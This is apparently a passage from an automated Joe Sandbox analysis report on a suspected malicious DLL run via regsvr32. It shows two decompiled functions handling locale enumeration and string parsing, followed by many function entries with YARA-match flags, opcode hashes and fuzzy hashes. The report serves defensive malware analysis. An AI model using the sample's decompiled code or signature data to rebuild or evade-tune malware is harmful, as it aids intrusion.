			E00007FFD7FFD2B077E88(void* __rax, void* __rcx) {
				void* _t11;
				int _t13;
				void* _t20;

				_t20 = __rax;
				E00007FFD7FFD2B0653B0(_t11,  *((intOrPtr*)(__rcx + 8)));
				 *(__rcx + 0x1c) = 0 | _t20 == 0x00000003;
				_t13 = EnumSystemLocalesA(??, ??);
				if (( *(__rcx + 0x10) & 0x00000004) != 0) goto 0x2b077ec2;
				 *(__rcx + 0x10) =  *(__rcx + 0x10) & 0x00000000;
				return _t13;
			}

0x7ffd2b077e88
0x7ffd2b077e95
0x7ffd2b077eaa
0x7ffd2b077eb2
0x7ffd2b077ebc
0x7ffd2b077ebe
0x7ffd2b077ec7

APIs

EnumSystemLocalesA.KERNEL32 ref: 00007FFD2B077EB2

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: b28db194df395bffae68cc6a1e738accf7ef328d5622b04674ba9b50cc763b50
Instruction ID: 1ae68ab57cfb29ce1da3d7fc2d0b044d93b7c0f69dea7d460a3d346c578059e9
Opcode Fuzzy Hash: b28db194df395bffae68cc6a1e738accf7ef328d5622b04674ba9b50cc763b50
Instruction Fuzzy Hash: 7FE086A7F0660543EB078F21DD513786250EFA9B49F484431CA1D012E6CFFCDA96E780

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180023E9C Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

;0xG, xrefs: 0000000180024188

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;0xG
API String ID: 0-760963809
Opcode ID: 2ac6aef73004f145c9832d09e3489353ee51daebb3c9bbce0e583765372a3508
Instruction ID: e1ce0d046311d09060dabb304b72a3b603daa738e67fdfa472c4c11d7b7ed73b
Opcode Fuzzy Hash: 2ac6aef73004f145c9832d09e3489353ee51daebb3c9bbce0e583765372a3508
Instruction Fuzzy Hash: 8EC1E470D047588BDB68DFB8C98A59DBBF1FB58308F20421DE816AB2A2DB749945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002BA3C Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

#BQ, xrefs: 000000018002BDBE

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #BQ
API String ID: 0-3480728874
Opcode ID: ec69ecc2c3011c286e8f83292b208dc01f079ea9ee5e21749ca29fc9a84d9ebb
Instruction ID: 4bd203b3754685935ea88d17ca58c286c0398b84f00ad44a0aac603c9aa4d465
Opcode Fuzzy Hash: ec69ecc2c3011c286e8f83292b208dc01f079ea9ee5e21749ca29fc9a84d9ebb
Instruction Fuzzy Hash: 7CC1487190060D8FDB59DFA8C48A6DEBFB1FF54344F108129E806AB294C7749A9ACFC1

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D1CC Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

r[+, xrefs: 000000018000D3F8

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: r[+
API String ID: 0-86127173
Opcode ID: 552607c096838cf115fd81e4e776186d890cbc1676763cf46e7b8b005de89252
Instruction ID: 0d7e3af77b8b752942e86a438abd9f326c11496982b6e8965f69b2f7eba2be57
Opcode Fuzzy Hash: 552607c096838cf115fd81e4e776186d890cbc1676763cf46e7b8b005de89252
Instruction Fuzzy Hash: C9C117715047898BEBB9CE28C8867D93BA0FB55344F90C51DE88ECF391DF749A898B41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800191E0 Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

y$P2, xrefs: 00000001800194AF

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: y$P2
API String ID: 0-2052838114
Opcode ID: d3fba8c71ba653b337be21bfc5c821221b7847ff7f4f4145c71630cbd7702008
Instruction ID: af04be29cfbb26f8734603d57978402f182defc2485c97293f597167a387eff1
Opcode Fuzzy Hash: d3fba8c71ba653b337be21bfc5c821221b7847ff7f4f4145c71630cbd7702008
Instruction Fuzzy Hash: A1C169B1A047098FDF88DF68C59A59E7BB9BB55308F004129FC0E9A290E775F919CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800094BC Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

WJG, xrefs: 00000001800096EB

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: WJG
API String ID: 0-3237630811
Opcode ID: 9d6c801bdc1b237faa773838eee8f0beff03794f3b8bf96e4e9610ac38792612
Instruction ID: 891d7379a6736ad59a15f2bd9ca0e0e7aa9bc69e8541a48b63682a1a39ca707a
Opcode Fuzzy Hash: 9d6c801bdc1b237faa773838eee8f0beff03794f3b8bf96e4e9610ac38792612
Instruction Fuzzy Hash: 9CC155B590070DCFDB58CF68C08A99E7BB9FB55708F404129FC0E9A2A4D7B4E518CB56

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000ABDC Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

, O6, xrefs: 000000018000AEBC

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: , O6
API String ID: 0-1270239017
Opcode ID: 1aa911f5b7b95dd106d68ec324b05e9f4d445a39aeb37152fbab4812de8cd21e
Instruction ID: 3c4be7746686757421e7955503ac86f474c7edc4d3d79d8dc77912d08fa14a1d
Opcode Fuzzy Hash: 1aa911f5b7b95dd106d68ec324b05e9f4d445a39aeb37152fbab4812de8cd21e
Instruction Fuzzy Hash: C5A11A71E0878C8BEB59CFE8C44ABDEBBF2EB15348F404129D506BA298D7B48519CB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001F388 Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

84Rx, xrefs: 000000018001F554

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 84Rx
API String ID: 0-3790243014
Opcode ID: 05f828dc8d583a7cb4dfceb09e169c9743c4d84338123e06152ee941db349f64
Instruction ID: 5d9026638de9e31bc9841207fea4698c37f6cb1d122bda01837218ac41b9dba7
Opcode Fuzzy Hash: 05f828dc8d583a7cb4dfceb09e169c9743c4d84338123e06152ee941db349f64
Instruction Fuzzy Hash: 26811571908B08EFDB58DF28C089A9D7BE1FB58304F40C16EE85ADB294DB74DA49CB45

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C788 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

,MT5, xrefs: 000000018000C88D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,MT5
API String ID: 0-998673786
Opcode ID: 054bca4c7d4db6ffa480f83350d3550c28c23d9a57c29e9f915b334c989a3521
Instruction ID: 0c0f437e0ff8ec548d1b83d7fce4e839fa7e820a53018cca1ea92611ff89abb2
Opcode Fuzzy Hash: 054bca4c7d4db6ffa480f83350d3550c28c23d9a57c29e9f915b334c989a3521
Instruction Fuzzy Hash: FEA179B590274DDBDB98DF28C68A58D7BF1FF59304F004029FC5A9A2A0E3B4D529CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800299A4 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

#, xrefs: 0000000180029A1B

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #
API String ID: 0-2259475770
Opcode ID: 4fab1216560e636846c4e0077fb0153bc3122cc5dd91fdf1c3791336c7a236b5
Instruction ID: f014af94a3d87d64c150a3a738861456c5900205c36fce6610c3e49e2845f8e4
Opcode Fuzzy Hash: 4fab1216560e636846c4e0077fb0153bc3122cc5dd91fdf1c3791336c7a236b5
Instruction Fuzzy Hash: CD51AA309146098BEF89DF68D4863E97BB1FB48390F60911DF842E7291DB38D886CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015344 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

W), xrefs: 00000001800153F3

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: W)
API String ID: 0-4136714496
Opcode ID: aa58a1d29eb591927417709c5ff6981b383c0183172096cfb276ed068bf31a1b
Instruction ID: 7046a0e034b52ac37a1b8491b86b07f5ec2b18bde789a8abaaf0a2f9c7a84f06
Opcode Fuzzy Hash: aa58a1d29eb591927417709c5ff6981b383c0183172096cfb276ed068bf31a1b
Instruction Fuzzy Hash: B1514A71514B8E8BDB59CF18D84579A3BE0FB54345F104A2DF8A6C7295DBB0CA2ACB80

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010330 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

]H,4, xrefs: 000000018001052E

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ]H,4
API String ID: 0-2117028608
Opcode ID: edc2f691050df4596d563631735a3ebf903215a1b182d29dca97e8b961dbfc2b
Instruction ID: a4000fa144d7654680c025209b591c7ed87c6842f21b7a4690e5a63011254de6
Opcode Fuzzy Hash: edc2f691050df4596d563631735a3ebf903215a1b182d29dca97e8b961dbfc2b
Instruction Fuzzy Hash: 9C61C87154878CCBEBBADE28C8997D937B1FB48344F90821DD85E8E290DB74574ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001EEE0 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

=i, xrefs: 000000018001EF43

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =i
API String ID: 0-2257234515
Opcode ID: ec1b152295a7fe302f8d34dc8a196b0ac00e16f654829f9babee527285ab370e
Instruction ID: b2866ee7f69725311540b76dd5608a0f6ee0b10b6433d698f80210b395c18649
Opcode Fuzzy Hash: ec1b152295a7fe302f8d34dc8a196b0ac00e16f654829f9babee527285ab370e
Instruction Fuzzy Hash: 05718EB190074E8FDB49CF68D88A4DE7FB0FB68398F204119F856A6250D3B496A4CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180026098 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

.G, xrefs: 00000001800261EC

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .G
API String ID: 0-218996393
Opcode ID: d7d879f287b0a9261b25502e2af63799bd74a524d91ce029b3aff8a94adfe669
Instruction ID: 0cc7e45cd08ef152d1e265dbc3d05f5a0dbfa635a64f4929b61d99de85e64566
Opcode Fuzzy Hash: d7d879f287b0a9261b25502e2af63799bd74a524d91ce029b3aff8a94adfe669
Instruction Fuzzy Hash: 7551F4705006888BDB49DF28CD866DD7BE0FB4C34DF128319F88AA6265D77C9909CB49

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A470 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

e{W, xrefs: 000000018001A549

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: e{W
API String ID: 0-4062984353
Opcode ID: d86e3ed5d33b91fb2f35fcfa748914f527afa3803bf7698958360a6d31994bea
Instruction ID: ade444b95570d3d7f89f0b1b0cefea3937e05147eb3c1450965c96d4acf29a62
Opcode Fuzzy Hash: d86e3ed5d33b91fb2f35fcfa748914f527afa3803bf7698958360a6d31994bea
Instruction Fuzzy Hash: B961B5B190078A8FDF98DF68C8494DE7BB0FF18358F104A19E865A6250D3B8D665CF94

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E310 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

)ceS, xrefs: 000000018000E434

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )ceS
API String ID: 0-1544017277
Opcode ID: 56e9a884abbcd7d48d5070ab7709f921dabee0fd494d5f91ad116a0a9e01e1fb
Instruction ID: db4328d043d7ce9183d1f4de1c8254b0628263dcb251aebb3facae7a7ecf6164
Opcode Fuzzy Hash: 56e9a884abbcd7d48d5070ab7709f921dabee0fd494d5f91ad116a0a9e01e1fb
Instruction Fuzzy Hash: 0551B2B090034A8FCB48CF68D4865DE7FB0FB68398F10461DF816AA250D77496A5CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0715B0 Relevance: 1.4, Strings: 1, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00007FFD7FFD2B0715B0(void* __ecx, long long __rbx, char* __rcx, char* __rdx, long long __rdi, long long __rsi, void* __r8) {
				void* _t27;
				char _t30;
				signed int _t34;
				intOrPtr* _t73;
				long long _t91;
				intOrPtr* _t93;
				void* _t94;
				void* _t101;

				_t84 = __rdx;
				_t73 = _t93;
				 *((long long*)(_t73 + 8)) = __rbx;
				 *((long long*)(_t73 + 0x10)) = _t91;
				 *((long long*)(_t73 + 0x18)) = __rsi;
				 *((long long*)(_t73 + 0x20)) = __rdi;
				_t94 = _t93 - 0x30;
				r8d = 0x90;
				E00007FFD7FFD2B0656D0(_t27, __ecx, 0, __rcx, __rdx, __r8);
				if ( *__rdx != 0) goto 0x2b0715e8;
				goto 0x2b071745;
				if ( *__rdx != 0x2e) goto 0x2b07162e;
				if ( *((char*)(__rdx + 1)) == 0) goto 0x2b07162e;
				_t7 = _t84 - 1; // 0xf
				r9d = _t7;
				_t30 = E00007FFD7FFD2B077670(_t73, __rcx + 0x80, __rdx, __rdx + 1, _t101);
				if (_t30 != 0) goto 0x2b071618;
				 *((char*)(__rcx + 0x8f)) = _t30;
				goto 0x2b0715e1;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FFD7FFD2B06938C();
				asm("int3");
				E00007FFD7FFD2B0775DC(0, __rdx, 0x2b0846a0, __rdx + 1, _t101);
				if (_t73 == 0) goto 0x2b071742;
				dil =  *((intOrPtr*)(_t73 + __rdx));
				if (0 != 0) goto 0x2b071697;
				if (_t73 - 0x40 >= 0) goto 0x2b071742;
				if (dil == 0x2e) goto 0x2b071742;
				if (E00007FFD7FFD2B077670(_t73, __rcx, 0x2b0846a0, __rdx, _t73) == 0) goto 0x2b07170d;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FFD7FFD2B06938C();
				asm("int3");
				if (0 != 1) goto 0x2b0716dc;
				if (_t73 - 0x40 >= 0) goto 0x2b071742;
				if (dil == 0x5f) goto 0x2b071742;
				if (E00007FFD7FFD2B077670(_t73, __rcx + 0x40, 0x2b0846a0, __rdx, _t73) == 0) goto 0x2b07170d;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FFD7FFD2B06938C();
				asm("int3");
				if (0 != 2) goto 0x2b071742;
				if (_t73 - 0x10 >= 0) goto 0x2b071742;
				if (dil == 0) goto 0x2b0716f2;
				if (dil != 0x2c) goto 0x2b071742;
				_t34 = E00007FFD7FFD2B077670(_t73, __rcx + 0x80, 0x2b0846a0, __rdx, _t73);
				if (_t34 != 0) goto 0x2b07172c;
				if (dil == 0x2c) goto 0x2b0715e1;
				if (dil == 0) goto 0x2b0715e1;
				goto 0x2b071630;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FFD7FFD2B06938C();
				asm("int3");
				return _t34 | 0xffffffff;
			}

0x7ffd2b0715b0
0x7ffd2b0715b0
0x7ffd2b0715b3
0x7ffd2b0715b7
0x7ffd2b0715bb
0x7ffd2b0715bf
0x7ffd2b0715c5
0x7ffd2b0715cc
0x7ffd2b0715d7
0x7ffd2b0715df
0x7ffd2b0715e3
0x7ffd2b0715eb
0x7ffd2b0715f5
0x7ffd2b071603
0x7ffd2b071603
0x7ffd2b071607
0x7ffd2b07160e
0x7ffd2b071610
0x7ffd2b071616
0x7ffd2b071618
0x7ffd2b07161e
0x7ffd2b071621
0x7ffd2b071628
0x7ffd2b07162d
0x7ffd2b07163a
0x7ffd2b071642
0x7ffd2b07164c
0x7ffd2b071652
0x7ffd2b071658
0x7ffd2b071662
0x7ffd2b07167b
0x7ffd2b071681
0x7ffd2b071687
0x7ffd2b07168a
0x7ffd2b071691
0x7ffd2b071696
0x7ffd2b07169a
0x7ffd2b0716a0
0x7ffd2b0716aa
0x7ffd2b0716c4
0x7ffd2b0716c6
0x7ffd2b0716cc
0x7ffd2b0716cf
0x7ffd2b0716d6
0x7ffd2b0716db
0x7ffd2b0716df
0x7ffd2b0716e5
0x7ffd2b0716ea
0x7ffd2b0716f0
0x7ffd2b071704
0x7ffd2b07170b
0x7ffd2b071711
0x7ffd2b07171a
0x7ffd2b071727
0x7ffd2b07172c
0x7ffd2b071732
0x7ffd2b071735
0x7ffd2b07173c
0x7ffd2b071741
0x7ffd2b07175f

Strings

_.,, xrefs: 00007FFD2B071630

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: CurrentProcess
String ID: _.,
API String ID: 2050909247-2709443920
Opcode ID: d4ba83de0e29a6ce361679c48265e188c18c8996d356c85632479586fba6144a
Instruction ID: dcae653baa14b21a7c26a7350981faf26ca9529390868377e344be268adfd3f2
Opcode Fuzzy Hash: d4ba83de0e29a6ce361679c48265e188c18c8996d356c85632479586fba6144a
Instruction Fuzzy Hash: C1411921F0928249FB76DB219E21779A251EB86784F488531DF4D066E9DFBCE880F380

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013DBC Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

:&@a, xrefs: 0000000180013ED4

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :&@a
API String ID: 0-1222566720
Opcode ID: ef56b835c1ac4e0f565372fe5218a42215f4a7ac1fc0ee983be682905883d724
Instruction ID: dca83b27cd108ad56cb5c8e9dd3496707112838bcc42d0e40cff073e0d9fad2e
Opcode Fuzzy Hash: ef56b835c1ac4e0f565372fe5218a42215f4a7ac1fc0ee983be682905883d724
Instruction Fuzzy Hash: 1E51E9B190038E8FDF48CF68C8865DE7BB1FB58318F11461DF866A6290D7B89664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011F30 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

9f5N, xrefs: 00000001800120C8

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 9f5N
API String ID: 0-3546837380
Opcode ID: 2d6bbebbf1fffb99614440976ac829ccc1d63a212d4338abcb42fa4d6e83890b
Instruction ID: d7fe8c1a37bf7d93f42541ec35eb2d9279b795251d56db1e3052a43da40964b0
Opcode Fuzzy Hash: 2d6bbebbf1fffb99614440976ac829ccc1d63a212d4338abcb42fa4d6e83890b
Instruction Fuzzy Hash: 7351B4B190038ECFDF48CF64C98A4DE7FB1FB48358F514A19E865AA250D3B89664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001F624 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

@tn, xrefs: 000000018001F73F

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @tn
API String ID: 0-486704939
Opcode ID: 3c7a22537a38b63f7d8a4caf5fc308f545bf2d81324b7bf7ffc0dcbf14c8ceb0
Instruction ID: 1ad08388cb2090aea4793fe9f1d77af1efd936fc687c4d5d49db90a3eff6790a
Opcode Fuzzy Hash: 3c7a22537a38b63f7d8a4caf5fc308f545bf2d81324b7bf7ffc0dcbf14c8ceb0
Instruction Fuzzy Hash: 7151AFB090034ECFDB49CF68D48A5DE7FB0FB28798F205619E816A6250D37496A8CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B670 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

%5, xrefs: 000000018001B692

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %5
API String ID: 0-4288218683
Opcode ID: e19f81e7731bf8f55acd48642bb7f84a1c679841a035f48cc6e26b3b4c1e9c09
Instruction ID: 171d4cf5f209aac3d30eec7e712f16342b1e6532b50d04c19f0157b94c604ffa
Opcode Fuzzy Hash: e19f81e7731bf8f55acd48642bb7f84a1c679841a035f48cc6e26b3b4c1e9c09
Instruction Fuzzy Hash: 8D315770619B449BD788DF28D49962BBBE0FBD8354F805A2DF486C73A4C7B4D844CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002A43C Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

1@, xrefs: 000000018002A59A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1@
API String ID: 0-4049097949
Opcode ID: b0dcbee87ea97880fe62916228da27271ec4ec0a6590d100feca8ba74251f583
Instruction ID: 564d36d4ae3bf85f0f9b495a4212e59b0a735af734936f678ad91dad6dec08ae
Opcode Fuzzy Hash: b0dcbee87ea97880fe62916228da27271ec4ec0a6590d100feca8ba74251f583
Instruction Fuzzy Hash: 1951E5B090074E8FCB48DF64C88A5DEBFF0FB58358F105A1DE825A6260D3B89664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021B10 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

{/, xrefs: 0000000180021BC1

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: {/
API String ID: 0-179448227
Opcode ID: f425cea6d577d2550e9093a617ff984dc38a375202500c18f500f06871d85014
Instruction ID: 9193d036ecfcbd9fbd2dc66581ad9ead9cbe9977bd339fe7c8868008dfc03d32
Opcode Fuzzy Hash: f425cea6d577d2550e9093a617ff984dc38a375202500c18f500f06871d85014
Instruction Fuzzy Hash: 9351B3B190038E8BDF48CF68C88A5DE7FB0FB58358F11461DE866A6250D3B89665CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003800 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

E{, xrefs: 0000000180003886

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: E{
API String ID: 0-184549643
Opcode ID: c84fec003f3615db82e712a9f30eb593275e25114ef0862840c409ef5fec6f13
Instruction ID: 7216f9f5fa68ff11c39a81af28dda8205ef160c074595fba5378e339776bff02
Opcode Fuzzy Hash: c84fec003f3615db82e712a9f30eb593275e25114ef0862840c409ef5fec6f13
Instruction Fuzzy Hash: 9A41D7B090038E8FDB48DF68C98A5DE7BB0FB58358F104A1DF865A7290D7B49664CF94

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B4CC Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

xw, xrefs: 000000018001B610

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: xw
API String ID: 0-1750992286
Opcode ID: 91b8c8d5e853583d3d1a4b143dba9b680e3fdd6e0d47eec3f1e6f3b81338a568
Instruction ID: 69de6bf323214bd62a7bb9aa21d760b3734cee2d320dc8eeae92c3d9eb18c048
